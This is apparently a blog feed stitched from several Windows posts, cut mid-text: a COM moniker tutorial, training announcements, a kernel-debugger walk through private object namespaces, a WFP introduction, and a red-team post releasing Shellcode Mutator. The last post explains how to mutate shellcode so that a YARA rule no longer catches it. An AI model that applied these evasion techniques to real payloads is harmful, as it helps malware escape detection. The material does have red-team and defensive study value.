auto hr = spShell.CoCreateInstance(__uuidof(ShellWindows));

I use the ATL smart pointers (#include <atlcomcli.h> or <atlbase.h>). The interface and class I’m using is just an example – any standard COM class would work. The CoCreateInstance method calls the real CoCreateInstance. To make it clearer, here is the CoCreateInstance call without using the helper provided by the smart pointer:

CComPtr<IShellWindows> spShell;
auto hr = ::CoCreateInstance(__uuidof(ShellWindows), nullptr, 
    CLSCTX_ALL, __uuidof(IShellWindows), 
    reinterpret_cast<void**>(&spShell));

CoCreateInstance itself is a glorified wrapper for calling CoGetClassObject to retrieve a class factory, requesting the standard IClassFactory interface, and then calling CreateInstance on it:

CComPtr<IClassFactory> spCF;
auto hr = ::CoGetClassObject(__uuidof(ShellWindows), 
    CLSCTX_ALL, nullptr, __uuidof(IClassFactory), 
    reinterpret_cast<void**>(&spCF));
if (SUCCEEDED(hr)) {
    CComPtr<IShellWindows> spShell;
    hr = spCF->CreateInstance(nullptr, __uuidof(IShellWindows),
        reinterpret_cast<void**>(&spShell));
    if (SUCCEEDED(hr)) {
        // use spShell
    }
}

Here is where the Class moniker comes in: It’s possible to get a class factory directly using a string like so:

CComPtr<IClassFactory> spCF;
BIND_OPTS opts{ sizeof(opts) };
auto hr = ::CoGetObject(
    L"clsid:9BA05972-F6A8-11CF-A442-00A0C90A8F39", 
    &opts, __uuidof(IClassFactory), 
    reinterpret_cast<void**>(&spCF));

Using CoGetObject is the most convenient way in C++ to locate an object based on a moniker. The moniker name is the string provided to CoGetObject. It starts with a ProgID of sorts followed by a colon. The rest of the string is to be interpreted by the moniker behind the scenes. With the class factory in hand, the code can use IClassFactory::CreateInstance just as with the previous example.

How does it work? As is usual with COM, the Registry is involved. If you open RegEdit or TotalRegistry and navigate to HKYE_CLASSES_ROOT, ProgIDs are all there. One of them is “clsid” – yes, it’s a bit weird perhaps, but the entry point to the moniker system is that ProgID. Each ProgID should have a CLSID subkey pointing to the class ID of the moniker. So here, the key is HKCR\CLSID\CLSID!

Class Moniker Registration

Of course, other monikers have different names (not CLSID). If we follow the CLSID on the right to the normal location for COM CLSID registration (HKCR\CLSID), this is what we find:

Class moniker

And the InProcServer32 subkey points to Combase.dll, the DLL implementing the COM infrastructure:

Class Moniker Implementation

At this point, we know how the class moniker got discovered, but it’s still not clear what is that moniker and where is it anyway?

As mentioned earlier, CoGetObject is the simplest way to get an object from a moniker, as it hides the details of the moniker itself. CoGetObject is a shortcut for calling MkParseDisplayName – the real entry point to the COM moniker namespace. Here is the full way to get a class moniker by going through the moniker:

CComPtr<IMoniker> spClsMoniker;
CComPtr<IBindCtx> spBindCtx;
::CreateBindCtx(0, &spBindCtx);
ULONG eaten;
CComPtr<IClassFactory> spCF;
auto hr = ::MkParseDisplayName(
    spBindCtx,
    L"clsid:9BA05972-F6A8-11CF-A442-00A0C90A8F39",
    &eaten, &spClsMoniker);
if (SUCCEEDED(hr)) {
    spClsMoniker->BindToObject(spBindCtx, nullptr,
        __uuidof(IClassFactory), reinterpret_cast<void**>(&spCF));

MkParseDisplayName takes a “display name” – a string, and attempts to locate the moniker based on the information in the Registry (it actually has some special code for certain OLE stuff which is not interesting in this context). The Bind Context is a helper object that can (in the general case) contain an arbitrary set of properties that can be used by the moniker to customize the way it interprets the display name. The class moniker does not use any property, but it’s still necessary to provide the object even if it has no interesting data in it. If successful, MkParseDisplayName returns the moniker interface pointer, implementing the IMoniker interface that all monikers must implement. IMoniker is somewhat a scary interface, having 20 methods (excluding IUnknown). Fortunately, not all have to be implemented. We’ll get to implementing our own moniker soon.

The primary method in IMoniker is BindToObject, which is tasked of interpreting the display name, if possible, and returning the real object that the client is trying to locate. The client provides the interface it expects the target object to implement – IClassFactory in the case of a class moniker.

You might be wondering what’s the point of the class moniker if you could simply create the required object directly with the normal class factory. One advantage of the moniker is that a string is involved, which allows “late binding” of sorts, and allows other languages, such as scripting languages, to create COM objects indirectly. For example, VBScript provides the GetObject function that calls CoGetObject.

Implementing a Moniker

Some details are still missing, such as how does the moniker object itself gets created? To show that, let’s implement our own moniker. We’ll call it the Process Moniker – its purpose is to locate a COM process object we’ll implement that allows working with a Windows Process object.

Here is an example of something a client would do to find a process object based on its PID, and then display its executable path:

BIND_OPTS opts{ sizeof(opts) };
CComPtr<IWinProcess> spProcess;
auto hr = ::CoGetObject(L"process:3284", 
    &opts, __uuidof(IWinProcess), 
    reinterpret_cast<void**>(&spProcess));
if (SUCCEEDED(hr)) {
    CComBSTR path;
    if (S_OK == spProcess->get_ImagePath(&path)) {
        printf("Image path: %ws\n", path.m_str);
    }
}

The IWinProcess is the interface our process object implements, but there is no need to know its CLSID (in fact, it has none, and is created privately by the moniker). The display name “prcess:3284” identifies the string “process” as the moniker name, meaning there must be a subkey under HKCR named “process” for this to have any chance of working. And under the “process” key there must be the CLSID of the moniker. Here is the final result:

process moniker

The CLSID of the process moniker must be registered normally like all COM classes. The text after the colon is passed to the moniker which should interpret it in a way that makes sense for that moniker (or fail trying). In our case, it’s supposed to be a PID of an existing process.

Let’s see the main steps needed to implement the process moniker. From a technical perspective, I created an ATL DLL project in Visual Studio (could be an EXE as well), and then added an “ATL Simple Object” class template to get the boilerplate code the ATL template provides. We just need to implement IMoniker – no need for some custom interface. Here is the layout of the class:

class ATL_NO_VTABLE CProcessMoniker :
	public CComObjectRootEx<CComMultiThreadModel>,
	public CComCoClass<CProcessMoniker, &CLSID_ProcessMoniker>,
	public IMoniker {
public:
	DECLARE_REGISTRY_RESOURCEID(106)
	DECLARE_CLASSFACTORY_EX(CMonikerClassFactory)

	BEGIN_COM_MAP(CProcessMoniker)
		COM_INTERFACE_ENTRY(IMoniker)
	END_COM_MAP()

	DECLARE_PROTECT_FINAL_CONSTRUCT()
	HRESULT FinalConstruct() {
		return S_OK;
	}
	void FinalRelease() {
	}

public:
	// Inherited via IMoniker
	HRESULT __stdcall GetClassID(CLSID* pClassID) override;
	HRESULT __stdcall IsDirty(void) override;
	HRESULT __stdcall Load(IStream* pStm) override;
	HRESULT __stdcall Save(IStream* pStm, BOOL fClearDirty) override;
	HRESULT __stdcall GetSizeMax(ULARGE_INTEGER* pcbSize) override;
	HRESULT __stdcall BindToObject(IBindCtx* pbc, IMoniker* pmkToLeft, REFIID riidResult, void** ppvResult) override;
    // other IMoniker methods...
	std::wstring m_DisplayName;
};

OBJECT_ENTRY_AUTO(__uuidof(ProcessMoniker), CProcessMoniker)

Those familiar with the typical code the ATL wizard generates might notice one important difference from the standard template: the class factory. It turns out that monikers are not created by an IClassFactory when called by a client invoking MkParseDisplayName (or its CoGetObject wrapper), but instead must implement the interface IParseDisplayName, which we’ll tackle in a moment. This is why DECLARE_CLASSFACTORY_EX(CMonikerClassFactory) is used to instruct ATL to use a custom class factory which we must implement.

MkParseDisplayName operation

Before we get to that, let’s implement the “main” method – BindToObject. We have to assume that the m_DisplayName member already has the process ID – it will be provided by our class factory that creates our moniker. First, we’ll convert the display name to a number:

HRESULT __stdcall CProcessMoniker::BindToObject(IBindCtx* pbc, IMoniker* pmkToLeft, REFIID riidResult, void** ppvResult) {
	auto pid = std::stoul(m_DisplayName);

Next, we’ll attempt to open a handle to the process:

auto hProcess = ::OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, 
    FALSE, pid);
if (!hProcess)
    return HRESULT_FROM_WIN32(::GetLastError());

If we fail, we just return a failed HRESULT and we’re done. If successful, we can create the WinProcess object, pass the handle and return the interface requested by the client (if supported):

	CComObject<CWinProcess>* pProcess;
	auto hr = pProcess->CreateInstance(&pProcess);
	pProcess->SetHandle(hProcess);
	pProcess->AddRef();
	
	hr = pProcess->QueryInterface(riidResult, ppvResult);
	pProcess->Release();
	return hr;
}

The creation of the object is internal via CComObject<>. The WinProcess COM class is not registered, which is just a matter of choice. I decided, a WinProcess object can only be obtained through the Process Moniker.

The calls to AddRef/Release may be puzzling, but there is a good reason for using them. When creating a CComObject<> object, the reference count of the object is zero. Then, the call to AddRef increments it to 1. Next, if the QueryInterface call succeeds, the ref count is incremented to 2. Then, the Release call decrements it to 1, as that is the correct count when the object is returned to the client. If, however, the call to QI fails, the ref count remains at 1, and the Release call will destroy the object! More elegant than calling delete.

SetHandle is a function in CWinProcess (outside the IWinProcess interface) that passes the handle to the object.

The WinProcess COM class is the uninteresting part in all of these, so I created a bare minimum class like so:

class ATL_NO_VTABLE CWinProcess :
	public CComObjectRootEx<CComMultiThreadModel>,
	public IDispatchImpl<IWinProcess> {
public:
	DECLARE_NO_REGISTRY()

	BEGIN_COM_MAP(CWinProcess)
		COM_INTERFACE_ENTRY(IWinProcess)
		COM_INTERFACE_ENTRY(IDispatch)
		COM_INTERFACE_ENTRY_AGGREGATE(IID_IMarshal, m_pUnkMarshaler.p)
	END_COM_MAP()

	DECLARE_PROTECT_FINAL_CONSTRUCT()
	DECLARE_GET_CONTROLLING_UNKNOWN()

	HRESULT FinalConstruct() {
		return CoCreateFreeThreadedMarshaler(
			GetControllingUnknown(), &m_pUnkMarshaler.p);
	}

	void FinalRelease() {
		m_pUnkMarshaler.Release();
		if (m_hProcess)
			::CloseHandle(m_hProcess);
	}

	void SetHandle(HANDLE hProcess);

private:
	HANDLE m_hProcess{ nullptr };
	CComPtr<IUnknown> m_pUnkMarshaler;

	// Inherited via IWinProcess
	HRESULT get_Id(DWORD* pId);
	HRESULT get_ImagePath(BSTR* path);
	HRESULT Terminate(DWORD exitCode);
};

The two properties and one method look like this:

void CWinProcess::SetHandle(HANDLE hProcess) {
	m_hProcess = hProcess;
}

HRESULT CWinProcess::get_Id(DWORD* pId) {
	ATLASSERT(m_hProcess);
	return *pId = ::GetProcessId(m_hProcess), S_OK;
}

HRESULT CWinProcess::get_ImagePath(BSTR* pPath) {
	WCHAR path[MAX_PATH];
	DWORD size = _countof(path);
	if (::QueryFullProcessImageName(m_hProcess, 0, path, &size))
		return CComBSTR(path).CopyTo(pPath);

	return HRESULT_FROM_WIN32(::GetLastError());
}

HRESULT CWinProcess::Terminate(DWORD exitCode) {
	HANDLE hKill;
	if (::DuplicateHandle(::GetCurrentProcess(), m_hProcess, 
		::GetCurrentProcess(), &hKill, PROCESS_TERMINATE, FALSE, 0)) {
		auto success = ::TerminateProcess(hKill, exitCode);
		auto error = ::GetLastError();
		::CloseHandle(hKill);
		return success ? S_OK : HRESULT_FROM_WIN32(error);
	}
	return HRESULT_FROM_WIN32(::GetLastError());
}

The APIs used above are fairly straightforward and of course fully documented.

The last piece of the puzzle is the moniker’s class factory:

class ATL_NO_VTABLE CMonikerClassFactory : 
	public ATL::CComObjectRootEx<ATL::CComMultiThreadModel>,
	public IParseDisplayName {
public:
	BEGIN_COM_MAP(CMonikerClassFactory)
		COM_INTERFACE_ENTRY(IParseDisplayName)
	END_COM_MAP()

	// Inherited via IParseDisplayName
	HRESULT __stdcall ParseDisplayName(IBindCtx* pbc, LPOLESTR pszDisplayName, ULONG* pchEaten, IMoniker** ppmkOut) override;
};

Just one method to implement:

HRESULT __stdcall CMonikerClassFactory::ParseDisplayName(
    IBindCtx* pbc, LPOLESTR pszDisplayName, 
    ULONG* pchEaten, IMoniker** ppmkOut) {
    auto colon = wcschr(pszDisplayName, L':');
    ATLASSERT(colon);
    if (colon == nullptr)
        return E_INVALIDARG;

    //
    // simplistic, assume all display name consumed
    //
    *pchEaten = (ULONG)wcslen(pszDisplayName);

    CComObject<CProcessMoniker>* pMon;
    auto hr = pMon->CreateInstance(&pMon);
    if (FAILED(hr))
        return hr;

    //
    // provide the process ID
    //
    pMon->m_DisplayName = colon + 1;
    pMon->AddRef();
    hr = pMon->QueryInterface(ppmkOut);
    pMon->Release();
    return hr;
}

First, the colon is searched for, as the display name looks like “process:xxxx”. The “xxxx” part is stored in the resulting moniker, created with CComObject<>, similarly to the CWinProcess earlier. The pchEaten value reports back how many characters were consumed – the moniker factory should parse as much as it understands, because moniker composition may be in play. Hopefully, I’ll discuss that in a future post.

Finally, registration must be added for the moniker. Here is ProcessMoniker.rgs, where the lower part was added to connect the “process” ProgId/moniker name to the CLSID of the process moniker:

HKCR
{
	NoRemove CLSID
	{
		ForceRemove {6ea3a80e-2936-43be-8725-2e95896da9a4} = s 'ProcessMoniker class'
		{
			InprocServer32 = s '%MODULE%'
			{
				val ThreadingModel = s 'Both'
			}
			TypeLib = s '{97a86fc5-ffef-4e80-88a0-fa3d1b438075}'
			Version = s '1.0'
		}
	}
	process = s 'Process Moniker Class'
	{
		CLSID = s '{6ea3a80e-2936-43be-8725-2e95896da9a4}'
	}
}

And that is it. Here is an example client that terminates a process given its ID:

void Kill(DWORD pid) {
	std::wstring displayName(L"process:");
	displayName += std::to_wstring(pid);
	BIND_OPTS opts{ sizeof(opts) };
	CComPtr<IWinProcess> spProcess;
	auto hr = ::CoGetObject(displayName.c_str(), &opts, 
		__uuidof(IWinProcess), reinterpret_cast<void**>(&spProcess));
	if (SUCCEEDED(hr)) {
		auto hr = spProcess->Terminate(1);
		if (SUCCEEDED(hr))
			printf("Process %u terminated.\n", pid);
		else
			printf("Error terminating process: hr=0x%X\n", hr);
	}
}

All the code can be found in this Github repo: zodiacon/MonikerFun: Demonstrating a simple moniker. (github.com)

Here is VBScript example (this works because WinProcess implements IDispatch):

set process = GetObject("process:25520")
MsgBox process.ImagePath

How about .NET or PowerShell? Here is Powershell:

PS> $p = [System.Runtime.InteropServices.Marshal]::BindToMoniker("process:25520")
PS> $p | Get-Member                                                                                             

   TypeName: System.__ComObject#{3ab0471f-2635-429d-95e9-f2baede2859e}

Name      MemberType Definition
----      ---------- ----------
Terminate Method     void Terminate (uint)
Id        Property   uint Id () {get}
ImagePath Property   string ImagePath () {get}


PS> $p.ImagePath
C:\Windows\System32\notepad.exe

The DisplayWindows function just displays names of Explorer windows obtained by using IShellWindows:

void DisplayWindows(IShellWindows* pShell) {
	long count = 0;
	pShell->get_Count(&count);
	for (long i = 0; i < count; i++) {
		CComPtr<IDispatch> spDisp;
		pShell->Item(CComVariant(i), &spDisp);
		CComQIPtr<IWebBrowserApp> spWin(spDisp);
		if (spWin) {
			CComBSTR name;
			spWin->get_LocationName(&name);
			printf("Name: %ws\n", name.m_str);
		}
	}
}

Happy Moniker day!

Next Windows Internals Training

1 October 2022 at 03:04

I’m happy to open registration for the next 5 day Windows Internals training to be conducted in November in the following dates and from 11am to 7pm, Eastern Standard Time (EST) (8am to 4pm PST): 21, 22, 28, 29, 30.

The syllabus can be found here (some modifications possible, but the general outline should remain).

Training cost is 900 USD if paid by an individual, or 1800 USD if paid by a company. Participants in any of my previous training classes get 10% off.

If you’d like to register, please send me an email to [email protected] with “Windows Internals training” in the title, provide your full name, company (if any), preferred contact email, and your time zone.

The sessions will be recorded, so you can watch any part you may be missing, or that may be somewhat overwhelming in “real time”.

As usual, if you have any questions, feel free to send me an email, or DM on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

Upcoming COM Programming Class

3 December 2022 at 18:11

Today I’m happy to announce the next COM Programming class to be held in February 2023. The syllabus for the 3 day class can be found here. The course will be delivered in 6 half-days (4 hours each).

Dates: February (7, 8, 9, 14, 15, 16).
Times: 11am to 3pm EST (8am to 12pm PST) (4pm to 8pm UT)
Cost: 750 USD (if paid by an individual), 1400 USD (if paid by a company).

Half days should make it comfortable enough even if you’re not in an ideal time zone.

The class will be conducted remotely using Microsoft Teams.

What you need to know before the class: You should be comfortable using Windows on a Power User level. Concepts such as processes, threads, DLLs, and virtual memory should be understood fairly well. You should have experience writing code in C and some C++. You don’t have to be an expert, but you must know C and basic C++ to get the most out of this class. In case you have doubts, talk to me.

Participants in my Windows Internals and Windows System Programming classes have the required knowledge for the class.

We’ll start by looking at why COM was created in the first place, and then build clients and servers, digging into various mechanisms COM provides. See the syllabus for more details.

Previous students in my classes get 10% off. Multiple participants from the same company get a discount (email me for the details).

To register, send an email to [email protected] with the title “COM Programming Training”, and write the name(s), email(s) and time zone(s) of the participants.

Unnamed Directory Objects

13 December 2022 at 03:33

A lot of the functionality in Windows is based around various kernel objects. One such object is a Directory, not to be confused with a directory in a file system. A Directory object is conceptually simple: it’s a container for other kernel objects, including other Directory objects, thus creating a hierarchy used by the kernel’s Object Manager to manage named objects. This arrangement can be easily seen with tools like WinObj from Sysinternals:

The left part of WinObj shows object manager directories, where named objects are “stored” and can be located by name. Clear and simple enough.

However, Directory objects can be unnamed as well as named. How can this be? Here is my Object Explorer tool (similar functionality is available with my System Explorer tool as well). One of its views is a “statistical” view of all object types, some of their properties, such as their name, type index, number of objects and handles, peak number of objects and handles, generic access mapping, and the pool type they’re allocated from.

If you right-click the Directory object type and select “All Objects”, you’ll see another view that shows all Directory objects in the system (well, not necessarily all, but most*).

If you scroll a bit, you’ll see many unnamed Directory objects that have no name:

It seems weird, as a Directory with no name doesn’t make sense. These directories, however, are “real” and serve an important purpose – managing a private object namespace. I blogged about private object namespaces quite a few years ago (it was in my old blog site that is now unfortunately lost), but here is the gist of it:

Object names are useful because they allow easy sharing between processes. For example, if two or more processes would like to share memory, they can create a memory mapped file object (called Section within the kernel) with a name they are all aware of. Calling CreateFileMapping (or one of its variants) with the same name will create the object (by the first caller), where subsequent callers get handles to the existing object because it was looked up by name.

This is easy and useful, but there is a possible catch: since the name is “visible” using tools or APIs, other processes can “interfere” with the object by getting their own handle using that visible name and “meddle” with the object, maliciously or accidentally.

The solution to this problem arrived in Windows Vista with the idea of private object namespaces. A set of cooperating processes can create a private namespace only they can use, protected by a “secret” name and more importantly a boundary descriptor. The details are beyond the scope of this post, but it’s all documented in the Windows API functions such as CreateBoundaryDescriptor, CreatePrivateNamespace and friends. Here is an example of using these APIs to create a private namespace with a section object in it (error handling omitted):

HANDLE hBD = ::CreateBoundaryDescriptor(L"MyDescriptor", 0);
BYTE sid[SECURITY_MAX_SID_SIZE];
auto psid = reinterpret_cast<PSID>(sid);
DWORD sidLen;
::CreateWellKnownSid(WinBuiltinUsersSid, nullptr, psid, &sidLen);
::AddSIDToBoundaryDescriptor(&m_hBD, psid);

// create the private namespace
hNamespace = ::CreatePrivateNamespace(nullptr, hBD, L"MyNamespace");
if (!hNamespace) { // maybe created already?
	hNamespace = ::OpenPrivateNamespace(hBD, L"MyNamespace");
namespace");
}

HANDLE hSharedMem = ::CreateFileMapping(INVALID_HANDLE_VALUE, nullptr, PAGE_READWRITE, 0, 1 << 12, L"MyNamespace\\MySharedMem"));

This snippet is taken from the PrivateSharing code example from the Windows 10 System Programming part 1 book.

If you run this demo application, and look at the resulting handle (hSharedMem) in the above code in a tool like Process Explorer or Object Explorer you’ll see the name of the object is not given:

The full name is not shown and cannot be retrieved from user mode. And even if it could somehow be located, the boundary descriptor provides further protection. Let’s examine this object in the kernel debugger. Copying its address from the object’s properties:

Pasting the address into a local kernel debugger – first using the generic !object command:

lkd> !object 0xFFFFB3068E162D10
Object: ffffb3068e162d10  Type: (ffff9507ed78c220) Section
    ObjectHeader: ffffb3068e162ce0 (new version)
    HandleCount: 1  PointerCount: 32769
    Directory Object: ffffb3069e8cbe00  Name: MySharedMem

The name is there, but the directory object is there as well. Let’s examine it:

lkd> !object ffffb3069e8cbe00
Object: ffffb3069e8cbe00  Type: (ffff9507ed6d0d20) Directory
    ObjectHeader: ffffb3069e8cbdd0 (new version)
    HandleCount: 3  PointerCount: 98300

    Hash Address          Type                      Name
    ---- -------          ----                      ----
     19  ffffb3068e162d10 Section                   MySharedMem

There is one object in this directory. What’s the directory’s name? We need to examine the object header for that – its address is given in the above output:

lkd> dt nt!_OBJECT_HEADER ffffb3069e8cbdd0
   +0x000 PointerCount     : 0n32769
   +0x008 HandleCount      : 0n1
   +0x008 NextToFree       : 0x00000000`00000001 Void
   +0x010 Lock             : _EX_PUSH_LOCK
   +0x018 TypeIndex        : 0x53 'S'
   +0x019 TraceFlags       : 0 ''
   +0x019 DbgRefTrace      : 0y0
   +0x019 DbgTracePermanent : 0y0
   +0x01a InfoMask         : 0x8 ''
   +0x01b Flags            : 0 ''
   +0x01b NewObject        : 0y0
   +0x01b KernelObject     : 0y0
   +0x01b KernelOnlyAccess : 0y0
   +0x01b ExclusiveObject  : 0y0
   +0x01b PermanentObject  : 0y0
   +0x01b DefaultSecurityQuota : 0y0
   +0x01b SingleHandleEntry : 0y0
   +0x01b DeletedInline    : 0y0
   +0x01c Reserved         : 0x301
   +0x020 ObjectCreateInfo : 0xffff9508`18f2ba40 _OBJECT_CREATE_INFORMATION
   +0x020 QuotaBlockCharged : 0xffff9508`18f2ba40 Void
   +0x028 SecurityDescriptor : 0xffffb305`dd0d56ed Void
   +0x030 Body             : _QUAD

Getting a kernel’s object name is a little tricky, and will not be fully described here. The first requirement is the InfoMask member must have bit 1 set (value of 2), as this indicates a name is present. Since it’s not (the value is 8), there is no name to this directory. We can examine the directory object in more detail by looking at the real data structure underneath given the object’s original address:

kd> dt nt!_OBJECT_DIRECTORY ffffb3069e8cbe00
   +0x000 HashBuckets      : [37] (null) 
   +0x128 Lock             : _EX_PUSH_LOCK
   +0x130 DeviceMap        : (null) 
   +0x138 ShadowDirectory  : (null) 
   +0x140 NamespaceEntry   : 0xffffb306`9e8cbf58 Void
   +0x148 SessionObject    : (null) 
   +0x150 Flags            : 1
   +0x154 SessionId        : 0xffffffff

The interesting piece is the NamespaceEntry member, which is not-NULL. This indicates the purpose of this directory: to be a container for a private namespace’s objects. You can also click on HasBuckets and locate the single section object there.

Going back to Process Explorer, enabling unnamed object handles (View menu, Show Unnamed Handles and Mappings) and looking for unnamed directory objects:

The directory’s address is the same one we were looking at!

The pointer at NamespaceEntry points to an undocumented structure that is not currently provided with the symbols. But just looking a bit beyond the directory’s object structure shows a hint:

lkd> db ffffb3069e8cbe00+158
ffffb306`9e8cbf58  d8 f9 a3 55 06 b3 ff ff-70 46 12 66 07 f8 ff ff  ...U....pF.f....
ffffb306`9e8cbf68  00 be 8c 9e 06 b3 ff ff-48 00 00 00 00 00 00 00  ........H.......
ffffb306`9e8cbf78  00 00 00 00 00 00 00 00-0b 00 00 00 00 00 00 00  ................
ffffb306`9e8cbf88  01 00 00 00 02 00 00 00-48 00 00 00 00 00 00 00  ........H.......
ffffb306`9e8cbf98  01 00 00 00 20 00 00 00-4d 00 79 00 44 00 65 00  .... ...M.y.D.e.
ffffb306`9e8cbfa8  73 00 63 00 72 00 69 00-70 00 74 00 6f 00 72 00  s.c.r.i.p.t.o.r.
ffffb306`9e8cbfb8  02 00 00 00 18 00 00 00-01 02 00 00 00 00 00 05  ................
ffffb306`9e8cbfc8  20 00 00 00 21 02 00 00-00 00 00 00 00 00 00 00   ...!...........

The name “MyDescriptor” is clearly visible, which is the name of the boundary descriptor in the above code.

The kernel debugger’s documentation indicates that the !object command with a -p switch should show the private namespaces. However, this fails:

lkd> !object -p
00000000: Unable to get value of ObpPrivateNamespaceLookupTable

The debugger seems to fail locating a global kernel variable. This is probably a bug in the debugger command, because object namespaces scope has changed since the introduction of Server Silos in Windows 10 version 1607 (for example, Docker uses these when running Windows containers). Each silo has its own object manager namespace, so the old global variable does not exist anymore. I suspect Microsoft has not updated this command switch to support silos. Even with no server silos running, the host is considered to be in its own (global) silo, called host silo. You can see its details by utilizing the !silo debugger command:

kd> !silo -g host
Server silo globals fffff80766124540:
		Default Error Port: ffff950815bee140
		ServiceSessionId  : 0
		OB Root Directory : 
		State             : Running

Clicking the “Server silo globals” link, shows more details:

kd> dx -r1 (*((nt!_ESERVERSILO_GLOBALS *)0xfffff80766124540))
(*((nt!_ESERVERSILO_GLOBALS *)0xfffff80766124540))                 [Type: _ESERVERSILO_GLOBALS]
    [+0x000] ObSiloState      [Type: _OBP_SILODRIVERSTATE]
    [+0x2e0] SeSiloState      [Type: _SEP_SILOSTATE]
    [+0x310] SeRmSiloState    [Type: _SEP_RM_LSA_CONNECTION_STATE]
    [+0x360] EtwSiloState     : 0xffff9507edbc9000 [Type: _ETW_SILODRIVERSTATE *]
    [+0x368] MiSessionLeaderProcess : 0xffff95080bbdb040 [Type: _EPROCESS *]
    [+0x370] ExpDefaultErrorPortProcess : 0xffff950815bee140 [Type: _EPROCESS *]
<truncated>

ObSiloState is the root object related to the object manager. Clicking this one shows:

lkd> dx -r1 (*((ntkrnlmp!_OBP_SILODRIVERSTATE *)0xfffff80766124540))
(*((ntkrnlmp!_OBP_SILODRIVERSTATE *)0xfffff80766124540))                 [Type: _OBP_SILODRIVERSTATE]
    [+0x000] SystemDeviceMap  : 0xffffb305c8c48720 [Type: _DEVICE_MAP *]
    [+0x008] SystemDosDeviceState [Type: _OBP_SYSTEM_DOS_DEVICE_STATE]
    [+0x078] DeviceMapLock    [Type: _EX_PUSH_LOCK]
    [+0x080] PrivateNamespaceLookupTable [Type: _OBJECT_NAMESPACE_LOOKUPTABLE]

PrivateNamespaceLookupTable is the root object for the private namespaces for this Silo (in this example it’s the host silo).

The interested reader is welcome to dig into this further.

The list of private namespaces is provided with the WinObjEx64 tool if you run it elevated and have local kernel debugging enabled, as it uses the kernel debugger’s driver to read kernel memory.

* Most objects, because the way Object Explorer works is by enumerating handles and associating them with objects. However, some objects are held using references from the kernel with zero handles. Such objects cannot be detected by Object Explorer.

Avoiding Detection with Shellcode Mutator

By: Rob Bone
21 December 2022 at 09:00

Today we are releasing a new tool to help red teamers avoid detection. Shellcode is a small piece of code that is typically used as the payload in an exploit, and can often be detected by its “signature”, or unique pattern. Shellcode Mutator mutates exploit source code without affecting its functionality, changing its signature and making it harder to reliably detect as malicious.

Download Shellcode Mutator

github GitHub: https://github.com/nettitude/ShellcodeMutator

Background

One of the main benefits of writing your shellcode in assembly is that you have full control over the structure of the shellcode.

For example, the content and order of the functions in the source file can (obviously) be changed and the code compiled to produce a new version of your shellcode. These changes don’t have to be functional however, we can use automated tools to mutate the shellcode source so that each time we compile it the functionality stays the same, but the contents are changed.

This then means that the resultant shellcode will have a different size, file hash, byte order etc, which will make it harder to reliably detect both statically and in memory.

This ability is orthogonal to shellcode encryption etc, as at some point encrypted and encoded shellcode needs to be decrypted and decoded and descrambled so that it can actually be executed, and at this point it may get detected.

Let’s make use of a concrete, if a little contrived, example.

Test Case

We can take the nasm source code for some MessageBox shellcode from Didier Stevens, compile it as per his instructions and inject it and we successfully get a message box – so far so good.

Testing the default shellcode.

If we were to extract this shellcode as a blue teamer and want to write detections to catch it, we may note the hash, examine the contents and the disassembly and then write a yara rule to be able to catch it in memory or on disk.

As show below, we can take a quick peek at the binary using binary refinery.

Taking a quick peek at the binary using binary refinery.

We also note the sha256 hash is a8fb8c2b46ab00c0c5bc6aa8d9d6d5263a8c4d83ad465a9c50313da17c85fcb3.

Rizin can be used to examine the shellcode disassembly.

Examining the shellcode disassembly using rizin.

If we were to write a very quick yara rule for this, we may choose to focus on the initial bytes which perform some setup. Replacing the offsets (e.g. [rbx + 0x113]) with wildcards and taking the bytes up to the second call at 0x0000001b we can write a quick yara rule that matches the shellcode in memory and on disk, but nothing else in e.g. C:\Windows\System32 (testing for false positives).

A quick-and-dirty yara rule for the shellcode.

The rule matches the shellcode on disk and in memory and triggers no false positives against anything in C:\Windows\System32.

The rule matches the shellcode on disk and in memory and triggers no false positives against anything in C:\Windows\System32.

So we have a reliable yara rule and add it to our threat hunts, all good right?

Shellcode Mutator

This is where the Shellcode Mutator project comes in. This simple python script will parse nasm source code and insert sets of instructions at random intervals that ‘do nothing’, but will then alter and byte order and file hash of the shellcode at the cost of increased size.

The script is easy enough to use, taking a source code ‘template’, an out file, a morph percentage and a flag to set x86 vs x64 mode.

Help text for shellcode mutator.

This script has some basic logic to check source lines but essentially has to sets of instructions that can be expanded upon, one for x86 and one for x64. Each entry in these instruction sets should, after all instructions have executed, leave all registers and flags in the same state as before they were executed to ensure that the shellcode can continue without erroring.

The default "no instructions" sets.

Along with some other logic, the script will place these instruction sets at random intervals (dictated by the morph percentage) before the instructions specified in the assembly_instructions variable:

Instructions that are used as triggers for the mutations.

If we run the script against our MessageBox shellcode, setting a morph percentage of 15% we get a source code file that is 57 lines instead of 53. Compiling that shellcode and executing the yara search shows that it is not caught and only the original shellcode matches.

The mutated MessageBox shellcode no longer matches our yara rule.

Examining the disassembly of the binary file shows that it has inserted a nop (0x90) instruction into the bytes that we matched upon (in addition to at other places). This of course also changed the file hash.

The instruction that caused our yara rule not to match.

There is an element of luck of course. We need to make sure that we change enough bytes that any yara rules will no longer match without actually knowing what those yara rules are (or any other detections). Increasing the morph percentage then will increase the number of alterations made and the likelihood of bypassing any rules at the cost of increased shellcode size.

Of course the big question is, does our shellcode still run?

Testing the morphed shellcode still works!

Winning!

Download Shellcode Mutator

github GitHub: https://github.com/nettitude/ShellcodeMutator

References

The post Avoiding Detection with Shellcode Mutator appeared first on LRQA Nettitude Labs.

Introduction to the Windows Filtering Platform

25 December 2022 at 03:25

As part of the second edition of Windows Kernel Programming, I’m working on chapter 13 to describe the basics of the Windows Filtering Platform (WFP). The chapter will focus mostly on kernel-mode WFP Callout drivers (it is a kernel programming book after all), but I am also providing a brief introduction to WFP and its user-mode API.

This introduction (with some simplifications) is what this post is about. Enjoy!

The Windows Filtering Platform (WFP) provides flexible ways to control network filtering. It exposes user-mode and kernel-mode APIs, that interact with several layers of the networking stack. Some configuration and control is available directly from user-mode, without requiring any kernel-mode code (although it does require administrator-level access). WFP replaces older network filtering technologies, such as Transport Driver Interface (TDI) filters some types of NDIS filters.

If examining network packets (and even modification) is required, a kernel-mode Callout driver can be written, which is what we’ll be concerned with in this chapter. We’ll begin with an overview of the main pieces of WFP, look at some user-mode code examples for configuring filters before diving into building simple Callout drivers that allows fine-grained control over network packets.

WFP is comprised of user-mode and kernel-mode components. A very high-level architecture is shown here:

